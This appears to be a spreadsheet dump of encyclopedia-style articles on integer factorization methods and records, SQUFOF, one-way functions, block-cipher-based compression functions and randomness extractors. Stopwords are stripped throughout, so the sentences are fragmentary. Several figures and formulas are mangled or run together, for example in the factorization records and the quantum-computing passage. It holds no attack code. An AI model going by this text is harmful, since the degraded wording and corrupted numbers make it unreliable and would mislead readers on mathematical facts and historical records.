integer factored, positive integer greater certain constant. factoring algorithm discriminant chosen multiple −dn, positive multiplier. algorithm expects exist enough smooth forms lenstra pomerance show choice restricted small guarantee smoothness result. denote primes kronecker symbol {\displaystyle \left({\tfrac {\delta }{q}}\right)=1} constructing generators prime forms sequence relations generators produced. size bounded {\displaystyle c_{0}(\log |\delta |)^{2}} constant {\displaystyle c_{0}} relation used relation product powers equal neutral element these relations used construct so-called ambiguous form element order dividing calculating corresponding factorization taking gcd, ambiguous form provides complete prime factorization this algorithm main steps: number factored. negative integer −dn, multiplier negative discriminant quadratic form. take first primes {\displaystyle p_{1}=2,p_{2}=3,p_{3}=5,\dots ,p_{t}} {\displaystyle t\in {\mathbb {\displaystyle f_{q}} random prime form {\displaystyle \left({\tfrac {\delta }{q}}\right)=1} find generating collect sequence relations satisfying: {\displaystyle \left(\prod _{x\in x_{}}x^{r(x)}\right).\left(\prod _{q\in p_{\delta }}f_{q}^{t(q)}\right)=1} construct ambiguous form {\displaystyle (a,b,c)} element order dividing obtain coprime factorization largest divisor {\displaystyle \delta =-4ac{\text{ }}a(a-4c){\text{ }}(b-2a)(b+2a)} ambiguous form provides factorization stop, otherwise find another ambiguous form factorization found. order prevent useless ambiguous forms generating, build 2-sylow group sll2(δ) g(δ).to obtain algorithm factoring positive integer, necessary steps algorithm trial division, jacobi test. expected running time algorithm stated probabilistic algorithm makes random choices. expected running time {\displaystyle l_{n}\left[{\tfrac {1}{2}},1+o(1)\right]} also aurifeuillean factorization bach's algorithm generating random numbers factorizations canonical representation positive integer factorization multiplicative partition {\displaystyle -adic valuation partition (number theory) writing number positive integers. notes references richard crandall carl pomerance (2001). prime numbers: computational perspective. springer. isbn 0-387-94777-9. chapter exponential factoring algorithms, 191–226. chapter subexponential factoring algorithms, 227–284. section 7.4: elliptic curve method, 301–313. donald knuth. computer programming, volume seminumerical algorithms, third edition. addison-wesley, 1997. isbn 0-201-89684-2. section 4.5.4: factoring primes, 379–417. samuel wagstaff (2013). factoring. providence, american mathematical society. isbn 978-1-4704-1048-3.. warren jr., henry (2013). hacker's delight ed.). addison wesley pearson education, inc. isbn 978-0-321-84268-8. external links msieve siqs helped complete largest public factorizations known richard brent, "recent progress prospects integer factorisation algorithms", computing combinatorics", 2000, 3–22. download manindra agrawal, neeraj kayal, nitin saxena, "primes annals mathematics 160(2): 781-793 (2004). august 2005 version eric weisstein, “rsa-640 factored” mathworld headline news, november 2005 dario alpern's integer factorization calculator factoring large integers</t>
  </si>
  <si>
    <t>Integer factorization records</t>
  </si>
  <si>
    <t>integer factorization process determining prime numbers divide given positive integer. doing quickly applications cryptography. difficulty depends size form number prime factors; currently difficult factorize large semiprimes (and, indeed, numbers small factors). numbers general form first enormous distributed factorisation rsa-129, challenge number described scientific american article 1977 first popularised cryptosystem. factorised september 1993 april 1994, using mpqs, relations contributed people internet, final stages calculation performed maspar supercomputer bell labs. between january august 1999, rsa-155, challenge number prepared company, factorised using gnfs relations contributed large group, final stages calculation performed nine days cray c916 supercomputer sara amsterdam academic computer center. january 2002, franke announced factorisation 158-digit cofactor 2953+1, using couple months university bonn, final stages done using cluster pentium-iii pcs. april 2003, team factored rsa-160 using hundred cpus bsi, final stages calculation done using processors origin supercomputer. 576-bit rsa-576 factored franke, kleinjung members nfsnet collaboration december 2003, using resources university bonn; soon afterwards, aoki, kida, shimoyama, sonoda ueda announced factored 164-digit cofactor 21826+1. 176-digit cofactor 11281+1 factored aoki, kida, shimoyama ueda february 2005 using machines rikkyo university japan.the 663-bit rsa-200 challenge number factored franke, kleinjung december 2003 2005, using cluster opteron processors germany; announcement made 2005. they later (november 2005) factored slightly smaller rsa-640 challenge number. december 2009, team including researchers cwi, epfl, inria addition authors previous record factored rsa-768, 232-digit semiprime. they used equivalent almost 2000 years computing single core opteron. november 2019, 795-bit rsa-240 factored fabrice boudot, pierrick gaudry, aurore guillevic, nadia heninger, emmanuel thomé paul zimmermann.in february 2020, factorization 829-bit rsa-250 completed. numbers special form 12151 bits (163 digits), factored april july 1993 team oregon state university.2773 bits (233 digits), factored april november 2000 'the cabal', matrix step done hours cray also used rsa-155.2809 bits (244 digits), factorisation announced start january 2003. sieving done cwi, scientific computing institute pure mathematics department bonn university, using private resources franke, kleinjung family bahr. linear algebra step done montgomery sara amsterdam.6353 bits (275 digits), factored aoki, kida, shimoyama ueda september 2005 january 2006 using snfs.21039 1039 bits (313 digits) (though factor bits already known) factored september 2006 2007 group including aoki, franke, kleinjung, lenstra osvik, using computers ntt, epfl university bonn.21061 1061 bits (320 digits) factored early 2011 august 2012 group headed greg childers fullerton, using nfs@home boinc project cpu-years sieving; linear algebra trestles cluster sdsc lonestar cluster tacc needed additional cpu-years.all unfactored parts numbers 1000 1200 factored multiple-number-sieve approach much sieving step could done simultaneously multiple numbers, group including kleinjung, lenstra, starting 2010. precise, n=1081 completed march 2013; n=1111 june 2013; n=1129 september 2013; n=1153 october 2013; n=1159 february 2014; 1177 2014, n=1193 august 2014, n=1199 december 2014; first detailed announcement made late august 2014. total effort project order 7500 cpu-years opterons, roughly 5700 years spent sieving 1800 years linear algebra. comparison efforts individuals 2007, thanks constant decline memory prices, ready availability multi-core 64-bit computers, availability efficient sieving code (developed thorsten kleinjung bonn group) ggnfs robust open-source software msieve finishing stages, special-form numbers bits general-form numbers bits factored months single person without special mathematical experience. these bounds increase possible secure collaboration dozen sieving; currently amount memory power single machine finishing stage equal barriers progress. 2009, benjamin moody factored 512-bit used sign ti-83 graphing calculator using software found internet; eventually texas instruments signing controversy. september 2013, 696-bit rsa-210 factored ryan propper using institutional resources; march 2013 october 2014, another 210-digit number (the 117th term 'home prime sequence' starting completed user known wraithx, using $7600 worth processing time amazon machines sieving, four months dual xeon e5-2687w linear algebra. records efforts quantum computers largest number reliably factored shor's algorithm factored 2012. previously factored several labs. april 2012, factorization {\displaystyle 143=13\times room temperature (300k) adiabatic quantum computer reported group xinhua peng. november 2014 discovered 2012 experiment fact also factored much larger numbers without knowing april 2016 18-bit number factored using quantum annealing d-wave quantum processor. shortly after, factored using higher room temperature. late 2019, zapata computing claimed press release factored 1,099,551,473,989 2021 released paper wherein also factored numbers 3,127 6,557.however three numbers (499*401 (200099), 557*523 (291311), 1048601*1048589 (1099551473989)) seem special easily factored using fermats factorization algorithm, requiring 3,1,1 iterations loop respectively. also seems 1099551473989 properly factorized, rather solved precompilation factoring problem; i.e. known solution factorization used construct quantum computer. precompiling problem 'factorization' could quantum computer qubits. also largest known prime number references</t>
  </si>
  <si>
    <t>Integer factorization algorithms</t>
  </si>
  <si>
    <t>Shanks's square forms factorization</t>
  </si>
  <si>
    <t>shanks's square forms factorization method integer factorization devised daniel shanks improvement fermat's factorization method. success fermat's method depends finding integers {\displaystyle {\displaystyle {\displaystyle x^{2}-y^{2}=n} {\displaystyle integer factored. improvement (noticed kraitchik) look integers {\displaystyle {\displaystyle {\displaystyle x^{2}\equiv y^{2}{\pmod {n}}} finding suitable pair {\displaystyle (x,y)} guarantee factorization {\displaystyle implies {\displaystyle factor {\displaystyle x^{2}-y^{2}=(x-y)(x+y)} good chance prime divisors {\displaystyle distributed factors, calculation greatest common divisor {\displaystyle {\displaystyle x-y} give non-trivial factor {\displaystyle practical algorithm finding pairs {\displaystyle (x,y)} satisfy {\displaystyle x^{2}\equiv y^{2}{\pmod {n}}} developed shanks, named square forms factorization squfof. algorithm expressed terms continued fractions terms quadratic forms. although much efficient factorization methods available, squfof advantage small enough implemented programmable calculator. 1858, czech mathematician václav šimerka used method similar squfof factor {\displaystyle (10^{17}-1)/9} {\displaystyle 11111111111111111 {\displaystyle 11111111111111111} {\displaystyle 2071723 5363222357 {\displaystyle 2071723\cdot 5363222357} algorithm input: {\displaystyle integer factored, must neither prime number perfect square, small multiplier {\displaystyle output: non-trivial factor {\displaystyle algorithm: initialize {\displaystyle p_{0}=\lfloor {\sqrt {kn}}\rfloor ,q_{0}=1,q_{1}=kn-p_{0}^{2}.} repeat {\displaystyle b_{i}=\left\lfloor {\frac {p_{0}+p_{i-1}}{q_{i}}}\right\rfloor ,p_{i}=b_{i}q_{i}-p_{i-1},q_{i+1}=q_{i-1}+b_{i}(p_{i-1}-p_{i})} {\displaystyle q_{i+1}} perfect square even {\displaystyle i+1} initialize {\displaystyle b_{0}=\left\lfloor {\frac {p_{0}-p_{i}}{\sqrt {q_{i+1}}}}\right\rfloor ,p_{0}=b_{0}{\sqrt {q_{i+1}}}+p_{i},q_{0}={\sqrt {q_{i+1}}},q_{1}={\frac {kn-p_{0}^{2}}{q_{0}}}} repeat {\displaystyle b_{i}=\left\lfloor {\frac {p_{0}+p_{i-1}}{q_{i}}}\right\rfloor ,p_{i}=b_{i}q_{i}-p_{i-1},q_{i+1}=q_{i-1}+b_{i}(p_{i-1}-p_{i})} {\displaystyle p_{i}=p_{i-1}.} then {\displaystyle f=\gcd(n,p_{i})} equal {\displaystyle equal {\displaystyle {\displaystyle non-trivial factor {\displaystyle otherwise another value {\displaystyle shanks's method time complexity {\displaystyle o({\sqrt[{4}]{n}})} stephen mcmath wrote detailed discussion mathematics shanks's method, together proof correctness. example 11111 {\displaystyle n=11111,k=1} here {\displaystyle q_{6}=25} perfect square. here {\displaystyle p_{3}=p_{4}=82} 11111 {\displaystyle gcd(11111,82)=41} factor 11111 {\displaystyle 11111} thus, 11111 {\displaystyle n=11111=41\cdot 271} example implementations below example function performing squfof factorization unsigned integer larger bits, without overflow transient operations. references buell (1989). binary quadratic forms. springer-verlag. isbn 0-387-97037-1. bressoud (1989). factorisation primality testing. springer-verlag. isbn 0-387-97040-1. riesel, hans (1994). prime numbers computer methods factorization (2nd ed.). birkhauser. isbn 0-8176-3743-5. samuel wagstaff, (2013). factoring. providence, american mathematical society. 163–168. isbn 978-1-4704-1048-3. external links daniel shanks: analysis improvement continued fraction method factorization, (transcribed mcmath 2004) daniel shanks: squfof notes, (transcribed mcmath 2004) stephen mcmath: parallel integer factorization using quadratic forms, 2005 mcmath, crabbe, joyner: continued fractions parallel squfof, 2005 jason gower, samuel wagstaff: square form factorisation (published) shanks's squfof factoring algorithm java-math-library</t>
  </si>
  <si>
    <t>One-way function</t>
  </si>
  <si>
    <t>computer science, one-way function function easy compute every input, hard invert given image random input. here, "easy" "hard" understood sense computational complexity theory, specifically theory polynomial time problems. one-to-one considered sufficient function called one-way (see theoretical definition, below). existence one-way functions still open conjecture. their existence would prove complexity classes equal, thus resolving foremost unsolved question theoretical computer science.: 2.2, page converse known true, i.e. existence proof p≠np would directly imply existence one-way functions.in applied contexts, terms "easy" "hard" usually interpreted relative specific computing entity; typically "cheap enough legitimate users" "prohibitively expensive malicious agents". one-way functions, sense, fundamental tools cryptography, personal identification, authentication, data security applications. while existence one-way functions sense also open conjecture, several candidates withstood decades intense scrutiny. some essential ingredients telecommunications, e-commerce, e-banking systems around world. theoretical definition function {0,1}* {0,1}* one-way computed polynomial time algorithm, polynomial time randomized algorithm {\displaystyle attempts compute pseudo-inverse succeeds negligible probability. (the superscript means number repetitions, kleene star.) that randomized algorithms {\displaystyle positive integers sufficiently large length(x) {\displaystyle \pr[f(f(f(x)))=f(x)]&lt;n^{-c},} probability choice discrete uniform distribution {0,1}n, randomness {\displaystyle .note that, definition, function must "hard invert" average-case, rather worst-case sense. this different much complexity theory (e.g., np-hardness), term "hard" meant worst-case. that even candidates one-way functions (described below) known np-complete, imply one-wayness. latter property based lack known algorithms solve problem. sufficient make function "lossy" (not one-to-one) one-way function. particular, function outputs string zeros input length one-way function easy come input result output. more precisely: function simply outputs string zeroes, algorithm outputs string length input f(x) "find" proper preimage output, even input originally used find output string. related concepts one-way permutation one-way function also permutation—that one-way function bijective. one-way permutations important cryptographic primitive, known existence implied existence one-way functions. trapdoor one-way function trapdoor permutation special kind one-way function. such function hard invert unless secret information, called trapdoor, known. collision-free hash function one-way function also collision-resistant; randomized polynomial time algorithm find collision—distinct values f(x) f(y)—with non-negligible probability. theoretical implications one-way functions one-way function, inversion would problem whose output hard compute definition) easy check (just computing it). thus, existence one-way function implies fp≠fnp, turn implies p≠np. however, p≠np imply existence one-way functions. existence one-way function implies existence many useful concepts, including: pseudorandom generators pseudorandom function families commitment schemes private-key encryption schemes secure adaptive chosen-ciphertext attack message authentication codes digital signature schemes (secure adaptive chosen-message attack) candidates one-way functions following several candidates one-way functions april 2009). clearly, known whether functions indeed one-way; extensive research failed produce efficient inverting algorithm them. multiplication factoring function takes inputs prime numbers binary notation returns product. this function "easily" computed o(b2) time, total number bits inputs. inverting function requires finding factors given integer best factoring algorithms known {\displaystyle o\left(\exp {\sqrt[{3}]{{\frac {64}{9}}b(\log b)^{2}}}\right)} time, number bits needed represent this function generalized allowing range suitable semiprimes. note one-way randomly selected integers since product factor probability (because probability arbitrary 1/2, likewise they're chosen independently, probability therefore 1/4; hence probability even, 3/4). rabin function (modular squaring) rabin function,: squaring modulo {\displaystyle n=pq} primes believed collection one-way functions. write rabin {\displaystyle \operatorname {rabin} _{n}(x)\triangleq x^{2}{\bmod {n}}} denote squaring modulo specific member rabin collection. shown extracting square roots, i.e. inverting rabin function, computationally equivalent factoring sense polynomial-time reduction). hence proven rabin collection one-way factoring hard. this also holds special case length. rabin cryptosystem based assumption rabin function one-way. discrete exponential logarithm modular exponentiation done polynomial time. inverting function requires computing discrete logarithm. currently several popular groups algorithm calculate underlying discrete logarithm polynomial time known. these groups finite abelian groups general discrete logarithm problem described thus. finite abelian group cardinality denote group operation multiplication. consider primitive element another element discrete logarithm problem find positive integer that: {\displaystyle \alpha ^{k}=\underbrace {\alpha \cdot \alpha \cdot \ldots \cdot \alpha _{k\;\mathrm {times} }=\beta integer solves equation termed discrete logarithm base writes logα popular choices group discrete logarithm cryptography cyclic groups (zp)× (e.g. elgamal encryption, diffie–hellman exchange, digital signature algorithm) cyclic subgroups elliptic curves finite fields (see elliptic curve cryptography). elliptic curve pairs elements field satisfying elements curve form group operation called "point addition" (which addition operation field). multiplication point integer (i.e., group action additive group integers) defined repeated addition point itself. known, easy compute known, assumed hard compute cryptographically secure hash functions there number cryptographic hash functions fast compute, 256. some simpler versions fallen sophisticated analysis, strongest versions continue offer fast, practical solutions one-way computation. most theoretical support functions techniques thwarting previously successful attacks. other candidates other candidates one-way functions based hardness decoding random linear codes, subset problem (naccache–stern knapsack cryptosystem), problems. universal one-way function there explicit function proved one-way, one-way functions exist. words, function one-way, since function first combinatorial complete one-way function demonstrated, known "universal one-way function". problem finding function thus reduced proving function exists. also one-way compression function cryptographic hash function geometric cryptography trapdoor function references further reading jonathan katz yehuda lindell (2007). introduction modern cryptography. press. isbn 1-58488-551-3. michael sipser (1997). introduction theory computation. publishing. isbn 978-0-534-94728-6. section 10.6.3: one-way functions, 374–376. christos papadimitriou (1993). computational complexity (1st ed.). addison wesley. isbn 978-0-201-53082-7. section 12.1: one-way functions, 279–298.</t>
  </si>
  <si>
    <t>One-way compression function</t>
  </si>
  <si>
    <t>cryptography, one-way compression function function transforms fixed-length inputs fixed-length output. transformation "one-way", meaning difficult given particular output compute inputs compress output. one-way compression functions related conventional data compression algorithms, instead inverted exactly (lossless compression) approximately (lossy compression) original data. one-way compression functions instance used merkle–damgård construction inside cryptographic hash functions. one-way compression functions often built block ciphers. some methods turn normal block cipher one-way compression function davies–meyer, matyas–meyer–oseas, miyaguchi–preneel (single-block-length compression functions) mdc-2/meyer–schilling, mdc-4, hirose (double-block-length compression functions). these methods described detail down. (mdc-2 also name hash function patented ibm.) compression compression function mixes fixed length inputs produces single fixed length output size inputs. this also seen compression function transforms large fixed-length input shorter, fixed-length output. instance, input might bits, input bits compressed together single output bits. this equivalent single 256-bit input compressed single output bits. some compression functions compress half, instead factor. example, input might bits, input bits, compressed single output bits. that total input bits compressed together output bits. mixing done full avalanche effect achieved. that every output depends every input bit. one-way one-way function function easy compute hard invert. one-way compression function (also called hash function) following properties: easy compute: input(s), easy calculate output. preimage-resistance: attacker knows output infeasible calculate input. words, given output {\displaystyle unfeasible calculate input {\displaystyle hash {\displaystyle \operatorname {hash} (m)=h} second preimage-resistance: given input {\displaystyle m_{1}} whose output {\displaystyle infeasible find another input {\displaystyle m_{2}} output {\displaystyle i.e. hash hash {\displaystyle \operatorname {hash} (m_{1})=\operatorname {hash} (m_{2})} collision-resistance: hard find different inputs compress output i.e. attacker able find pair messages {\displaystyle m_{1}\neq m_{2}} hash hash {\displaystyle \operatorname {hash} (m_{1})=\operatorname {hash} (m_{2})} birthday paradox (see also birthday attack) chance collision found time {\displaystyle 2^{n/2}} {\displaystyle number bits hash function's output. attack hash function thus able find collision less {\displaystyle 2^{n/2}} work.ideally would like "infeasibility" preimage-resistance second preimage-resistance mean work {\displaystyle 2^{n}} {\displaystyle number bits hash function's output. however, particularly second preimage-resistance difficult problem. merkle–damgård construction common one-way compression functions merkle–damgård construction inside cryptographic hash functions. most widely used hash functions, including md5, sha-1 (which deprecated) sha-2 construction. hash function must able process arbitrary-length message fixed-length output. this achieved breaking input series equal-sized blocks, operating sequence using one-way compression function. compression function either specially designed hashing built block cipher. last block processed also length padded, crucial security construction. when length padding (also called md-strengthening) applied, attacks cannot find collisions faster birthday paradox {\displaystyle 2^{n/2}} {\displaystyle block size bits) used function {\displaystyle collision-resistant. hence, merkle–damgård hash construction reduces problem finding proper hash function finding proper compression function. second preimage attack (given message {\displaystyle m_{1}} attacker finds another message {\displaystyle m_{2}} satisfy hash hash {\displaystyle \operatorname {hash} (m_{1})=\operatorname {hash} (m_{2})} done according kelsey schneier {\displaystyle 2^{k}} -message-block message time {\displaystyle k\times 2^{n/2+1}+2^{n-k+1}} note complexity attack reaches minimum {\displaystyle 2^{3n/4+2}} long messages {\displaystyle k=2^{n/4}} approaches {\displaystyle 2^{n}} messages short. construction block ciphers one-way compression functions often built block ciphers. block ciphers take (like one-way compression functions) fixed size inputs (the plaintext) return single output (the ciphertext) size input plaintext. however, modern block ciphers partially one-way. that given plaintext ciphertext infeasible find encrypts plaintext ciphertext. but, given ciphertext matching plaintext found simply using block cipher's decryption function. thus, turn block cipher one-way compression function extra operations added. some methods turn normal block cipher one-way compression function davies–meyer, matyas–meyer–oseas, miyaguchi–preneel (single-block-length compression functions) mdc-2, mdc-4, hirose (double-block-length compressions functions). single-block-length compression functions output number bits processed underlying block cipher. consequently, double-block-length compression functions output twice number bits. block cipher block size bits single-block-length methods create hash function block size bits produces hash bits. double-block-length methods make hashes double hash size compared block size block cipher used. 128-bit block cipher turned 256-bit hash function. these methods used inside merkle–damgård construction build actual hash function. these methods described detail down. using block cipher build one-way compression function hash function usually somewhat slower using specially designed one-way compression function hash function. this known secure constructions scheduling block message. black, cochran shrimpton shown impossible construct one-way compression function makes call block cipher fixed key. practice reasonable speeds achieved provided scheduling selected block cipher heavy operation. but, cases easier single implementation block cipher used block cipher hash function. also save code space tiny embedded systems like instance smart cards nodes cars machines. therefore, hash-rate rate gives glimpse efficiency hash function based certain compression function. rate iterated hash function outlines ratio number block cipher operations output. more precisely, rate represents ratio number processed bits input {\displaystyle output bit-length {\displaystyle block cipher, necessary block cipher operations {\displaystyle produce {\displaystyle output bits. generally, usage fewer block cipher operations results better overall performance entire hash function, also leads smaller hash-value could undesirable. rate expressed formula: {\displaystyle r_{h}={\frac {\left|m_{i}\right|}{s\cdot n}}} hash function considered secure least following conditions met: block cipher special properties distinguish ideal ciphers, weak keys keys lead identical related encryptions (fixed points key-collisions). resulting hash size enough. according birthday attack security level (generally assumed infeasible compute today) desirable thus hash size least bits. last block properly length padded prior hashing. (see merkle–damgård construction.) length padding normally implemented handled internally specialised hash functions like sha-1 etc.the constructions presented below: davies–meyer, matyas–meyer–oseas, miyaguchi–preneel hirose shown secure black-box analysis. goal show attack found efficient birthday attack certain assumptions. black-box model assumes block cipher used randomly chosen containing appropriate block ciphers. model attacker freely encrypt decrypt blocks, access implementation block cipher. encryption decryption function represented oracles receive pair either plaintext ciphertext key. oracles respond randomly chosen plaintext ciphertext, pair asked first time. they share table triplets, pair query corresponding response, return record, query received second time. proof collision finding algorithm makes randomly chosen queries oracles. algorithm returns responses result collision involving hash function built compression function applying block cipher else). probability algorithm returns dependent number queries determine security level. davies–meyer davies–meyer single-block-length compression function feeds block message {\displaystyle m_{i}} block cipher. feeds previous hash value {\displaystyle h_{i-1}} plaintext encrypted. output ciphertext also xored previous hash value {\displaystyle h_{i-1}} produce next hash value {\displaystyle h_{i}} first round previous hash value uses constant pre-specified initial value {\displaystyle h_{0}} mathematical notation davies–meyer described {\displaystyle h_{i}=e_{m_{i}}{(h_{i-1})}\oplus {h_{i-1}}} scheme rate keysize): {\displaystyle r_{dm}={\frac {k}{1\cdot n}}={\frac {k}{n}}} block cipher uses instance 256-bit keys message block {\displaystyle m_{i}} 256-bit chunk message. block cipher uses block size bits input output hash values round bits. variations method replace group operation, addition 32-bit unsigned integers. notable property davies–meyer construction even underlying block cipher totally secure, possible compute fixed points construction: {\displaystyle find value {\displaystyle {\displaystyle e_{m}(h)\oplus h=h} {\displaystyle h=e_{m}^{-1}(0)} this property random functions certainly have. far, practical attack based property, aware "feature". fixed-points used second preimage attack (given message {\displaystyle m_{1}} attacker finds another message {\displaystyle m_{2}} satisfy hash hash {\displaystyle \operatorname {hash} (m_{1})=\operatorname {hash} (m_{2})} kelsey schneier {\displaystyle 2^{k}} -message-block message time {\displaystyle 3\times 2^{n/2+1}+2^{n-k+1}} construction allow easy creation fixed points (like matyas–meyer–oseas miyaguchi–preneel) attack done {\displaystyle k\times 2^{n/2+1}+2^{n-k+1}} time. note cases complexity {\displaystyle 2^{n/2}} {\displaystyle 2^{n}} messages long messages shorter complexity attack approaches {\displaystyle 2^{n}} security davies–meyer construction ideal cipher model first proven winternitz. matyas–meyer–oseas matyas–meyer–oseas single-block-length one-way compression function considered dual (the opposite) davies–meyer. feeds block message {\displaystyle m_{i}} plaintext encrypted. output ciphertext also xored message block {\displaystyle m_{i}} produce next hash value {\displaystyle h_{i}} previous hash value {\displaystyle h_{i-1}} block cipher. first round previous hash value uses constant pre-specified initial value {\displaystyle h_{0}} block cipher different block sizes hash value {\displaystyle h_{i-1}} wrong size key. cipher might also special requirements key. then hash value first function {\displaystyle converted/padded cipher. mathematical notation matyas–meyer–oseas described {\displaystyle h_{i}=e_{g(h_{i-1})}(m_{i})\oplus m_{i}} scheme rate: {\displaystyle r_{mmo}={\frac {n}{1\cdot n}}=1} second preimage attack (given message {\displaystyle m_{1}} attacker finds another message {\displaystyle m_{2}} satisfy hash hash {\displaystyle \operatorname {hash} (m_{1})=\operatorname {hash} (m_{2})} done according kelsey schneier {\displaystyle 2^{k}} -message-block message time {\displaystyle k\times 2^{n/2+1}+2^{n-k+1}} note complexity {\displaystyle 2^{n/2}} {\displaystyle 2^{n}} messages long, messages shorter complexity attack approaches {\displaystyle 2^{n}} miyaguchi–preneel miyaguchi–preneel single-block-length one-way compression function extended variant matyas–meyer–oseas. independently proposed shoji miyaguchi bart preneel. feeds block message {\displaystyle m_{i}} plaintext encrypted. output ciphertext xored message block {\displaystyle m_{i}} also xored previous hash value {\displaystyle h_{i-1}} produce next hash value {\displaystyle h_{i}} previous hash value {\displaystyle h_{i-1}} block cipher. first round previous hash value uses constant pre-specified initial value {\displaystyle h_{0}} block cipher different block sizes hash value {\displaystyle h_{i-1}} wrong size key. cipher might also special requirements key. then hash value first function {\displaystyle converted/padded cipher. mathematical notation miyaguchi–preneel described {\displaystyle h_{i}=e_{g(h_{i-1})}(m_{i})\oplus h_{i-1}\oplus m_{i}} scheme rate: {\displaystyle r_{mp}={\frac {n}{1\cdot n}}=1} roles {\displaystyle m_{i}} {\displaystyle h_{i-1}} switched, {\displaystyle h_{i-1}} encrypted {\displaystyle m_{i}} thus making method extension davies–meyer instead. second preimage attack (given message {\displaystyle m_{1}} attacker finds another message {\displaystyle m_{2}} satisfy hash hash {\displaystyle \operatorname {hash} (m_{1})=\operatorname {hash} (m_{2})} done according kelsey schneier {\displaystyle 2^{k}} -message-block message time {\displaystyle k\times 2^{n/2+1}+2^{n-k+1}} note complexity {\displaystyle 2^{n/2}} {\displaystyle 2^{n}} messages long, messages shorter complexity attack approaches {\displaystyle 2^{n}} hirose hirose double-block-length one-way compression function consists block cipher plus permutation {\displaystyle proposed shoichi hirose 2006 based work mridul nandi. uses block cipher whose length {\displaystyle larger block length {\displaystyle produces hash size {\displaystyle example, candidates 192- 256-bit (and 128-bit block). each round accepts portion message {\displaystyle m_{i}} {\displaystyle k-n} bits long, uses update {\displaystyle -bit state values {\displaystyle {\displaystyle first, {\displaystyle m_{i}} concatenated {\displaystyle h_{i-1}} produce {\displaystyle k_{i}} then feedback values updated according {\displaystyle g_{i}=e_{k_{i}}(g_{i-1})\oplus g_{i-1}} {\displaystyle h_{i}=e_{k_{i}}(p(g_{i-1}))\oplus p(g_{i-1})} {\displaystyle p(g_{i-1})} arbitrary fixed-point-free permutation {\displaystyle -bit value, typically defined {\displaystyle p(x)=x\oplus arbitrary non-zero constant {\displaystyle (all ones convenient choice). each encryption resembles standard davies–meyer construction. advantage scheme proposed double-block-length schemes encryptions key, thus scheduling effort shared. final output {\displaystyle h_{t}||g_{t}} scheme rate {\textstyle r_{hirose}={\frac {k-n}{2n}}} relative encrypting message cipher. hirose also provides proof ideal cipher model. sponge construction sponge construction used build one-way compression functions. also whirlpool cryptographic hash function built using miyaguchi–preneel construction block cipher similar square aes. cbc-mac, omac, pmac methods turn block ciphers message authentication codes (macs). references citations sources</t>
  </si>
  <si>
    <t>Randomness extractor</t>
  </si>
  <si>
    <t>randomness extractor, often simply called "extractor", function, applied output weakly random entropy source, together short, uniformly random seed, generates highly random output appears independent source uniformly distributed. examples weakly random sources include radioactive decay thermal noise; restriction possible sources fully controlled, calculated predicted, lower bound entropy rate established. given source, randomness extractor even considered true random number generator (trng); single extractor proven produce truly random output type weakly random source. sometimes term "bias" used denote weakly random source's departure uniformity, older literature, extractors called unbiasing algorithms, take randomness so-called "biased" source output distribution appears unbiased. weakly random source always longer extractor's output, efficient extractor lowers ratio lengths much possible, simultaneously keeping seed length low. intuitively, means much randomness possible "extracted" source. note extractor conceptual similarities pseudorandom generator (prg), concepts identical. both functions take input small, uniformly random seed produce longer output "looks" uniformly random. some pseudorandom generators are, fact, also extractors. (when based existence hard-core predicates, think weakly random source truth tables predicates prove output statistically close uniform.) however, general definition specify weakly random source must used, case extractor, output statistically close uniform, required computationally indistinguishable uniform, somewhat weaker concept. nist special publication 800-90b (draft) recommends several extractors, including hash family states amount entropy input twice number bits output them, output considered essentially fully random. formal definition extractors min-entropy distribution {\displaystyle (denoted {\displaystyle h_{\infty }(x)} largest real number {\displaystyle {\displaystyle \pr[x=x]\leq 2^{-k}} every {\displaystyle range {\displaystyle essence, measures likely {\displaystyle take likely value, giving worst-case bound random {\displaystyle appears. letting {\displaystyle u_{\ell denote uniform distribution {\displaystyle \{0,1\}^{\ell clearly {\displaystyle h_{\infty }(u_{\ell })=\ell n-bit distribution {\displaystyle min-entropy {\displaystyle {\displaystyle (n,k)} distribution. definition (extractor): ε)-extractor {\displaystyle {\text{ext}}:\{0,1\}^{n}\times \{0,1\}^{d}\to \{0,1\}^{m}} function takes input sample {\displaystyle (n,k)} distribution {\displaystyle d-bit seed {\displaystyle u_{d}} outputs m-bit string. {\displaystyle {\text{ext}}} ε)-extractor, {\displaystyle (n,k)} distributions {\displaystyle output distribution {\displaystyle {\text{ext}}} ε-close {\displaystyle u_{m}} definition, ε-close refers statistical distance. intuitively, extractor takes weakly random n-bit input short, uniformly random seed produces m-bit output looks uniformly random. {\displaystyle (i.e. little uniform randomness possible) high {\displaystyle possible (i.e. many close-to-random bits output can). strong extractors extractor strong concatenating seed extractor's output yields distribution still close uniform. definition (strong extractor): {\displaystyle (k,\epsilon -strong extractor function {\displaystyle {\text{ext}}:\{0,1\}^{n}\times \{0,1\}^{d}\rightarrow \{0,1\}^{m}\,} every {\displaystyle (n,k)} distribution {\displaystyle distribution {\displaystyle u_{d}\circ {\text{ext}}(x,u_{d})} (the copies {\displaystyle u_{d}} denote random variable) {\displaystyle \epsilon -close uniform distribution {\displaystyle u_{m+d}} explicit extractors using probabilistic method, shown exists ε)-extractor, i.e. construction possible. however, usually enough merely show extractor exists. explicit construction needed, given follows: definition (explicit extractor): functions k(n), ε(n), d(n), m(n) family {extn} functions {\displaystyle {\text{ext}}_{n}:\{0,1\}^{n}\times \{0,1\}^{d(n)}\rightarrow \{0,1\}^{m(n)}} explicit ε)-extractor, ext(x, computed polynomial time input length) every extn (k(n), ε(n))-extractor. probabilistic method, shown exists ε)-extractor seed length {\displaystyle d=\log {(n-k)}+2\log \left({\frac {1}{\varepsilon }}\right)+o(1)} output length {\displaystyle m=k+d-2\log \left({\frac {1}{\varepsilon }}\right)-o(1)} dispersers variant randomness extractor weaker properties disperser. randomness extractors cryptography important aspects cryptography random generation. often necessary generate secret random keys sources semi-secret compromised degree. taking single, short (and secret) random source, extractor used generate longer pseudo-random key, used public encryption. more specifically, strong extractor used output appear uniformly random, even someone sees part (but all) source. example, source known seed known vice versa). this property extractors particularly useful commonly called exposure-resilient cryptography desired extractor used exposure-resilient function (erf). exposure-resilient cryptography takes account fact difficult keep secret initial exchange data often takes place initialization encryption application e.g., sender encrypted information provide receivers information required decryption. following paragraphs define establish important relationship kinds erf--k-erf k-aprf--which useful exposure-resilient cryptography. definition (k-erf): adaptive k-erf function {\displaystyle where, random input {\displaystyle computationally unbounded adversary {\displaystyle adaptively read {\displaystyle except {\displaystyle bits, {\displaystyle |\pr\{a^{r}(f(r))=1\}-\pr\{a^{r}(r)=1\}|\leq \epsilon (n)} negligible function {\displaystyle \epsilon (n)} (defined below). goal construct adaptive whose output highly random uniformly distributed. stronger condition often needed every output occurs 